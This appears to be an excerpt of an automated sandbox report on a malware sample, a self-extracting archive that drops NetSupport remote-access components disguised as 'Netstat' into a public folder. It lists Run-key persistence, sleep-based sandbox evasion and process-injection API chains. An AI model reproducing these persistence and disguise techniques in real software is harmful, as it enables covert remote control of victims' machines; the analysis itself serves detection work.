                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile written: C:\Users\Public\Netstat\client32.iniJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic file information: File size 2138135 > 1048576
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile opened: C:\Users\Public\Netstat\msvcr100.dllJump to behavior
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                Source: Binary string: msvcr100.i386.pdb source: bild.exe, bild.exe, 00000005.00000002.4163625872.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 00000006.00000002.1828393967.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 0000000A.00000002.1909924839.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 0000000B.00000002.1989498636.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: bild.exe, 00000005.00000002.4163937013.000000006F982000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000006.00000002.1828654414.000000006F982000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 0000000A.00000002.1910320123.000000006F982000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 0000000B.00000002.1989707601.000000006F982000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: bild.exe, 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: bild.exe, 00000005.00000002.4161091973.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000005.00000000.1712834967.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000006.00000000.1825297800.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000006.00000002.1826623935.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000A.00000002.1908011994.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000A.00000000.1906094191.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000B.00000000.1987565229.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000B.00000002.1988599605.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, bild.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: bild.exe, 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: bild.exe, 00000005.00000002.4163812487.000000006CEF5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 00000006.00000002.1828564621.000000006CEF5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 0000000A.00000002.1910207199.000000006CEF5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 0000000B.00000002.1989634737.000000006CEF5000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,5_2_11029590
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile created: C:\Users\Public\Netstat\__tmp_rar_sfx_access_check_5615000Jump to behavior
                                Source: PCICL32.DLL.0.drStatic PE information: section name: .hhshare
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D8D8B6 push ecx; ret 0_2_00D8D8C9
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D8CDF0 push eax; ret 0_2_00D8CE0E
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1116F055 push ecx; ret 5_2_1116F068
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11169F49 push ecx; ret 5_2_11169F5C
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11040E01 push 3BFFFFFEh; ret 5_2_11040E06
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C606BBF push ecx; ret 5_2_6C606BD2
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5F94C5 push ecx; ret 5_2_6C5F94D8
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5F8377 push 3BFFFFFFh; retf 5_2_6C5F837C
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5FE36C push edi; ret 5_2_6C5FE37B
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1116F055 push ecx; ret 6_2_1116F068
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11169F49 push ecx; ret 6_2_11169F5C
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11040E01 push 3BFFFFFEh; ret 6_2_11040E06
                                Source: msvcr100.dll.0.drStatic PE information: section name: .text entropy: 6.909044922675825

                                Persistence and Installation Behavior

                                barindex
                                Uses cmd line tools excessively to alter registry or file data
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile created: C:\Users\Public\Netstat\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile created: C:\Users\Public\Netstat\msvcr100.dllJump to dropped file
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile created: C:\Users\Public\Netstat\pcicapi.dllJump to dropped file
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile created: C:\Users\Public\Netstat\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile created: C:\Users\Public\Netstat\bild.exeJump to dropped file
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile created: C:\Users\Public\Netstat\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile created: C:\Users\Public\Netstat\PCICHEK.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile created: C:\Users\Public\Netstat\PCICL32.DLLJump to dropped file
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5E7030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,5_2_6C5E7030
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5D5490 GetPrivateProfileIntA,5_2_6C5D5490
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5D50E0 CreateFileA,wsprintfA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,5_2_6C5D50E0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5D5117 GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,5_2_6C5D5117
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,5_2_11127E10
                                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,5_2_11139090
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,5_2_1115B1D0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,5_2_11113290
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,5_2_110CB2B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,5_2_110CB2B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,5_2_110254A0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,5_2_110258F0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,5_2_11023BA0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,5_2_11024280
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11112670 IsIconic,GetTickCount,5_2_11112670
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,5_2_111229D0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,5_2_111229D0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,5_2_110C0BB0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,5_2_1115ADD0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,5_2_1115ADD0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,6_2_1115B1D0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,6_2_11139090
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,6_2_11113290
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,6_2_110CB2B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,6_2_110CB2B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,6_2_110254A0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,6_2_110258F0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,6_2_11023BA0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,6_2_11024280
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11112670 IsIconic,GetTickCount,6_2_11112670
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,6_2_111229D0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,6_2_111229D0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,6_2_110C0BB0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,6_2_1115ADD0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,6_2_1115ADD0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_11143570
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Contains functionality to detect sleep reduction / modifications
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5D91F05_2_6C5D91F0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5E4F305_2_6C5E4F30
                                Delayed program exit found
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_110B8200 Sleep,ExitProcess,5_2_110B8200
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110B8200 Sleep,ExitProcess,6_2_110B8200
                                Source: C:\Users\Public\Netstat\bild.exeWindow / User API: threadDelayed 427Jump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeWindow / User API: threadDelayed 8031Jump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeDropped PE file which has not been started: C:\Users\Public\Netstat\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeDropped PE file which has not been started: C:\Users\Public\Netstat\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeDropped PE file which has not been started: C:\Users\Public\Netstat\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decisiongraph_5-94273
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decisiongraph_5-95465
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decisiongraph_5-96148
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decisiongraph_5-99497
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decisiongraph_5-99895
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\bild.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\Public\Netstat\bild.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_5-99636
                                Source: C:\Users\Public\Netstat\bild.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-99387
                                Source: C:\Users\Public\Netstat\bild.exeAPI coverage: 6.1 %
                                Source: C:\Users\Public\Netstat\bild.exeAPI coverage: 2.6 %
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5E4F305_2_6C5E4F30
                                Source: C:\Users\Public\Netstat\bild.exe TID: 7724Thread sleep time: -59250s >= -30000sJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exe TID: 7728Thread sleep time: -42700s >= -30000sJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exe TID: 7724Thread sleep time: -2007750s >= -30000sJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\Public\Netstat\bild.exeLast function: Thread delayed
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5E3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6C5E3226h5_2_6C5E3130
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D7A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00D7A273
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D8A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00D8A537
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,5_2_1102D330
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,5_2_11065890
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,5_2_1106A0A0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,5_2_111266E0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,5_2_1110AFD0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102D330
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,6_2_11065890
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,6_2_1106A0A0
